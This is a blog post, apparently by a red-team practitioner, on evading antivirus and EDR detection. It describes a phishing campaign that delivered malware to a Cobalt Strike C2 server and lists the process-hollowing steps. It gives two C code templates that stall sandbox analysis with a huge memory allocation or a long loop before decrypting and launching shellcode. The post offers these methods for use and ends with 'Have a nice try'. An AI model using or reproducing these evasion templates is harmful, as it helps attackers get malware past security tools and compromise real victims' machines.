Basic AV/EDR Evasion

Malware, Reverse Engineering Leave a comment

Hi Guys,

Today I would like to shares techniques that has been common by a malware to stay silent under the detection on AV. I learned it from various research papers and articles available in the internet and I tried to implement and finetunes it for some purposes.

From my red team exercise experience long story short, we were able to create a phishing campaign that delivered a simple malware to a user that enable the C2 connection established to our Cobalt Strike Server. The malware use the technique of process hollowing and inject the malware payload into itself

Although the malware were detected by the EDR but due to low risk detection and the EDR was not really confident to stop the malware and this situation become our success. 🙂

Common Injection

As you have known the common ways of the malware doing their bad stuff is usually by doing memory injection or creating new thread and loading the DLL. You can see a sample from my previous post

The basic steps of the injection as below

Open a valid system process (like cmd.exe or calc.exe) in suspended state using CreateProcess

  1. Unmap the memory of the process (using NtUnmapViewOfSection)
  2. Replace it with the malware code (using WriteProcessMemory)
  3. Once the process is resumed (using ResumeThread), the malware executes instead of the process.

The above technique has become a standard steps on loading the bad payload to infect the machine. The steps above is very easy to be flagged as malware activities by some AV or EDR in sandbox

So how can basically we evade our activities from the detection. follow the below method

The “Offer you have to refuse” method

The concept of this technique is basically to create some activities that make the AV become reluctant to progress further such as creating long delays or requesting a very big memory that consumes to much of resources to do the dynamic malware analyses and available for the sandbox.

#define TOO_MUCH_MEM 100000000
int main()
{
  char * memdmp = NULL;
  memdmp = (char *) malloc(TOO_MUCH_MEM);
  if(memdmp!=NULL)
  {
    memset(memdmp,00, TOO_MUCH_MEM);
    free(memdmp);
    decryptCodeSection();
    startShellCode();
  }
  return 0;
}

With the below code we can even have a lesser detection since it has less trace on the OS API call and OS environment where AV or EDR put attention to

#define MAX_OP 100000000
int main()
{
  int cpt = 0;
  int i = 0;
  for(i =0; i < MAX_OP; i ++)
  {
    cpt++;
  }
  if(cpt == MAX_OP)
  {
    decryptCodeSection();
    startShellCode();
  }
  return 0;
}

Have a nice try …

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s